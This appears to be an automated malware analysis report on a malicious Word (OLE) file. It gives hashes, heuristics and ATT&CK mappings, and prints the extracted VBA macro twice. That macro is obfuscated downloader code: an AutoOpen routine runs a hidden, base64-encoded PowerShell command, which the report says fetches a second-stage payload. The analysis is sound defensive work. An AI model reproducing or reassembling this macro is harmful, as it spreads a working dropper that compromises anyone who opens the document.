Office (OLE) malware analysis — malicious · 3803bfbce21fffcf

MALICIOUS

Office (OLE)

104.8 KB Created: 2018-06-01 12:02:00 Authoring application: Microsoft Office Word First seen: 2018-06-19

MD5: b1ea7ac5687d32fc0d6423b378544b3b SHA-1: 83ed8157e6dd1df98cac7a86738560990c664389 SHA-256: 3803bfbce21fffcf67582832f8292d4e40e2417463b3040e293c1938179ef9c1

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine that calls a function which in turn executes a PowerShell command. The PowerShell command is obfuscated but appears to download and execute a second-stage payload. The presence of the Shell() call and the ClamAV detection strongly indicate malicious intent.

Heuristics 7

ClamAV: Doc.Malware.Powload-7004511-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Powload-7004511-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10440 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10440 bytes
SHA-256: `5c739e84d63b38565d13cdeab4648c6c228774d0b9380a4f2d047e0be3091d8a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "IYhHLpZiEaab" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function pkBqPH() On Error Resume Next aPNID = 42218 + Log(58466) - jaDhU / Atn(2854) / twoAjN / ulQZbN jzHcoE = CSng(29849 * CInt(7193) + 67849 - 64632) tBAGi = 33884 + Log(86118) - uANnZ / Atn(36411) / jUcsi / QRzcwE wMpOHo = CSng(73373 * CInt(22279) + 89415 - 78655) pkBqPH = jljRwmPIi + Shell(tGjzi + Chr(vbKeyP) + XzQKscC + tOqdFHp + YPGGETGCN + waIrv + BmdwlohcURP + XsMOFjoz, BwQocQA + vbHide + DoITjRl) wjPTu = 37319 + Log(19528) - JmYubr / Atn(6282) / djAdm / MPhKw ljqlfZ = CSng(87843 * CInt(96109) + 60601 - 95621) End Function Sub Autoopen() On Error Resume Next jSOvt = 46326 + Log(34299) - XDWJb / Atn(89013) / QlTzl / Vdvcvm CzFmf = CSng(24246 * CInt(38119) + 20598 - 45326) pkBqPH SrPva = 55249 + Log(30238) - OrUJI / Atn(58361) / MnLpTS / lCMawj OaAsUA = CSng(14806 * CInt(42245) + 77630 - 89811) End Sub Attribute VB_Name = "fEjvvsp" Function XzQKscC() On Error Resume Next hjkmA = 26620 + Log(87494) - qnWwfM / Atn(51875) / EkqLz / qzhhr iEwqlN = CSng(11473 * CInt(33065) + 25506 - 30420) wBfSRqNSXtw = "owersHeLL -e " + "IAAoAE4AZQ" + "B3AC0AbwBiAGoAR" + "QBjAHQA" + "IAAgAHMAeQBT" + "AFQAZ" + "QBNAC4ASQ" + "BPA" mDaho = 84099 + Log(5331) - uJFEv / Atn(73459) / XZtnFT / BQloj RGJGo = CSng(30186 * CInt(7992) + 15024 - 45364) BwwwsMjIznc = "C4AQ" + "wBPAE0AUAB" + "SAGUAc" + "wBTA" + "Ek" + "AbwBOAC4ARABF" + "AGYAb" + "AB" BFiPzh = 48749 + Log(99978) - DlqjX / Atn(50467) / BPBJv / LpzoAz jirzw = CSng(84694 * CInt(64620) + 50928 - 6138) sdiPqdOpf = "BAH" + "QA" + "ZQB" + "zAFQAU" + "gBlAE" + "EA" + "bQAoACAAWwBzA" + "HkAUwBUAEU" + "ATQAuAG" + "kAbwAuA" Trlmc = 52993 + Log(52678) - mfiNo / Atn(11187) / iBtpQ / hajWV rifskw = CSng(82283 * CInt(65870) + 34208 - 19514) fUkbb = "G0AZQBtAE8" + "AcgBZAFMAV" + "AByAGUAYQB" + "tAF0" + "AWwBTAHkAUwBU" + "AEUATQAuAEMA" + "bwBuAFYARQBSAH" + "QAXQA6ADoAZ" + "gBy" + "AE8ATQBCA" XzQKscC = wBfSRqNSXtw + BwwwsMjIznc + sdiPqdOpf + fUkbb End Function Function tOqdFHp() On Error Resume Next jOYON = 36856 + Log(73036) - tmlTq / Atn(76514) / nQlRBQ / hkrGn OzXwUo = CSng(20151 * CInt(51738) + 83695 - 88020) rpTJc = "EEAU" + "wBlADYANABzAHQA" + "UgBpAG4AZwA" + "oACcAVgBW" + "AEwAZg" HzEcH = 11439 + Log(27284) - EwLawA / Atn(16176) / cjoXHf / DwOozB KvWRKD = CSng(22889 * CInt(58393) + 50326 - 58439) jnuhLSz = "BiAD" + "UAcwB3AEUAS" + "AA2AGYAdAB" + "QAC8AQgBpAGwAQ" + "gB0AFIARwB2ADMA" + "eAA2AFoAT" + "wBRAFoATwB" RivDXb = 92387 + Log(23580) - huDWMb / Atn(11456) / ftROn / oQDiqE wGJupz = CSng(93314 * CInt(346) + 48393 - 75466) OYVLHFStP = "hAEoAYQBxAFcAUA" + "BhAFIAUwBXAGQA" + "dABWADIA" + "ZwB" + "QAE" + "cAT" mKvPsA = 9915 + Log(67359) - LwjMOd / Atn(13389) / nTwFH / jotbW JAGGYc = CSng(57221 * CInt(61186) + 46594 - 45601) vQYloHPu = "wBN" + "AFUATgBHAEkA" + "UQBkAGsAagBU" + "AEsALw" + "A3" + "ADQANw" + "A0AEcAVgBJ" ZHGaA = 48474 + Log(93821) - MqpMGq / Atn(74514) / DMbwYi / oKrao zbjPPX = CSng(97157 * CInt(2096) + 61552 - 67341) MvhwjiKFsA = "ADMASgAzAHgAZA" + "A5ADkAMwB" + "4ADEAMQBnAG4AYw" + "B5AGwAeQA4AGw" wvKnU = 76140 + Log(1281) - mwZTw / Atn(48042) / qCSPIw / uMPGz ToiXdM = CSng(3767 * CInt(56239) + 46084 - 33755) ijhNqiL = "AMwBjAHMAY" + "QBvAH" + "AAUgBI" + "AFYATgBHAEo" + "AMABkADEARg" XrLBp = 49831 + Log(15393) - qkjwiQ / Atn(51466) / oBzYN / KwzSBp XBTkzs = CSng(32958 * CInt(74830) + 12819 - 9185) siJai = "BEAG0ATAAxAHI" + "AUg" + "BjAE8AS" + "QBlAGgAcQ" + "BTAFYAdABxADgAc" + "gB" HUGFmr = 90774 + Log(14258) - vNbat / Atn(12344) / jOEWYS / TjNLl JihwK = CSng(33002 * CInt(88218) + 67934 - 8538) fUiJQaGmPES = "1AEwAZw" + "A5AGY" + "AVQBKAHMAQg" + "B5AHcAQQ" + "BLAFEANwBCAEYA" + "OQ" + "BBAFUAQwBN" + "AFcAYwBDAEY" + "ASgBEAHMANw" GXump = 17663 + Log(49429) - rrLkXC / Atn(65590) / oSnWZ / KjtRjf cMzcF = CSng(96211 * CInt(98459) + 57107 - 6139 ... (truncated)

SHA-256: 5c739e84d63b38565d13cdeab4648c6c228774d0b9380a4f2d047e0be3091d8a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "IYhHLpZiEaab"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function pkBqPH()
On Error Resume Next
aPNID = 42218 + Log(58466) - jaDhU / Atn(2854) / twoAjN / ulQZbN
jzHcoE = CSng(29849 * CInt(7193) + 67849 - 64632)
tBAGi = 33884 + Log(86118) - uANnZ / Atn(36411) / jUcsi / QRzcwE
wMpOHo = CSng(73373 * CInt(22279) + 89415 - 78655)
pkBqPH = jljRwmPIi + Shell(tGjzi + Chr(vbKeyP) + XzQKscC + tOqdFHp + YPGGETGCN + waIrv + BmdwlohcURP + XsMOFjoz, BwQocQA + vbHide + DoITjRl)
wjPTu = 37319 + Log(19528) - JmYubr / Atn(6282) / djAdm / MPhKw
ljqlfZ = CSng(87843 * CInt(96109) + 60601 - 95621)
End Function
Sub Autoopen()
On Error Resume Next
jSOvt = 46326 + Log(34299) - XDWJb / Atn(89013) / QlTzl / Vdvcvm
CzFmf = CSng(24246 * CInt(38119) + 20598 - 45326)
pkBqPH
SrPva = 55249 + Log(30238) - OrUJI / Atn(58361) / MnLpTS / lCMawj
OaAsUA = CSng(14806 * CInt(42245) + 77630 - 89811)
End Sub


Attribute VB_Name = "fEjvvsp"
Function XzQKscC()
On Error Resume Next
hjkmA = 26620 + Log(87494) - qnWwfM / Atn(51875) / EkqLz / qzhhr
iEwqlN = CSng(11473 * CInt(33065) + 25506 - 30420)
wBfSRqNSXtw = "owersHeLL -e " + "IAAoAE4AZQ" + "B3AC0AbwBiAGoAR" + "QBjAHQA" + "IAAgAHMAeQBT" + "AFQAZ" + "QBNAC4ASQ" + "BPA"
mDaho = 84099 + Log(5331) - uJFEv / Atn(73459) / XZtnFT / BQloj
RGJGo = CSng(30186 * CInt(7992) + 15024 - 45364)
BwwwsMjIznc = "C4AQ" + "wBPAE0AUAB" + "SAGUAc" + "wBTA" + "Ek" + "AbwBOAC4ARABF" + "AGYAb" + "AB"
BFiPzh = 48749 + Log(99978) - DlqjX / Atn(50467) / BPBJv / LpzoAz
jirzw = CSng(84694 * CInt(64620) + 50928 - 6138)
sdiPqdOpf = "BAH" + "QA" + "ZQB" + "zAFQAU" + "gBlAE" + "EA" + "bQAoACAAWwBzA" + "HkAUwBUAEU" + "ATQAuAG" + "kAbwAuA"
Trlmc = 52993 + Log(52678) - mfiNo / Atn(11187) / iBtpQ / hajWV
rifskw = CSng(82283 * CInt(65870) + 34208 - 19514)
fUkbb = "G0AZQBtAE8" + "AcgBZAFMAV" + "AByAGUAYQB" + "tAF0" + "AWwBTAHkAUwBU" + "AEUATQAuAEMA" + "bwBuAFYARQBSAH" + "QAXQA6ADoAZ" + "gBy" + "AE8ATQBCA"
XzQKscC = wBfSRqNSXtw + BwwwsMjIznc + sdiPqdOpf + fUkbb
End Function
Function tOqdFHp()
On Error Resume Next
jOYON = 36856 + Log(73036) - tmlTq / Atn(76514) / nQlRBQ / hkrGn
OzXwUo = CSng(20151 * CInt(51738) + 83695 - 88020)
rpTJc = "EEAU" + "wBlADYANABzAHQA" + "UgBpAG4AZwA" + "oACcAVgBW" + "AEwAZg"
HzEcH = 11439 + Log(27284) - EwLawA / Atn(16176) / cjoXHf / DwOozB
KvWRKD = CSng(22889 * CInt(58393) + 50326 - 58439)
jnuhLSz = "BiAD" + "UAcwB3AEUAS" + "AA2AGYAdAB" + "QAC8AQgBpAGwAQ" + "gB0AFIARwB2ADMA" + "eAA2AFoAT" + "wBRAFoATwB"
RivDXb = 92387 + Log(23580) - huDWMb / Atn(11456) / ftROn / oQDiqE
wGJupz = CSng(93314 * CInt(346) + 48393 - 75466)
OYVLHFStP = "hAEoAYQBxAFcAUA" + "BhAFIAUwBXAGQA" + "dABWADIA" + "ZwB" + "QAE" + "cAT"
mKvPsA = 9915 + Log(67359) - LwjMOd / Atn(13389) / nTwFH / jotbW
JAGGYc = CSng(57221 * CInt(61186) + 46594 - 45601)
vQYloHPu = "wBN" + "AFUATgBHAEkA" + "UQBkAGsAagBU" + "AEsALw" + "A3" + "ADQANw" + "A0AEcAVgBJ"
ZHGaA = 48474 + Log(93821) - MqpMGq / Atn(74514) / DMbwYi / oKrao
zbjPPX = CSng(97157 * CInt(2096) + 61552 - 67341)
MvhwjiKFsA = "ADMASgAzAHgAZA" + "A5ADkAMwB" + "4ADEAMQBnAG4AYw" + "B5AGwAeQA4AGw"
wvKnU = 76140 + Log(1281) - mwZTw / Atn(48042) / qCSPIw / uMPGz
ToiXdM = CSng(3767 * CInt(56239) + 46084 - 33755)
ijhNqiL = "AMwBjAHMAY" + "QBvAH" + "AAUgBI" + "AFYATgBHAEo" + "AMABkADEARg"
XrLBp = 49831 + Log(15393) - qkjwiQ / Atn(51466) / oBzYN / KwzSBp
XBTkzs = CSng(32958 * CInt(74830) + 12819 - 9185)
siJai = "BEAG0ATAAxAHI" + "AUg" + "BjAE8AS" + "QBlAGgAcQ" + "BTAFYAdABxADgAc" + "gB"
HUGFmr = 90774 + Log(14258) - vNbat / Atn(12344) / jOEWYS / TjNLl
JihwK = CSng(33002 * CInt(88218) + 67934 - 8538)
fUiJQaGmPES = "1AEwAZw" + "A5AGY" + "AVQBKAHMAQg" + "B5AHcAQQ" + "BLAFEANwBCAEYA" + "OQ" + "BBAFUAQwBN" + "AFcAYwBDAEY" + "ASgBEAHMANw"
GXump = 17663 + Log(49429) - rrLkXC / Atn(65590) / oSnWZ / KjtRjf
cMzcF = CSng(96211 * CInt(98459) + 57107 - 6139
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.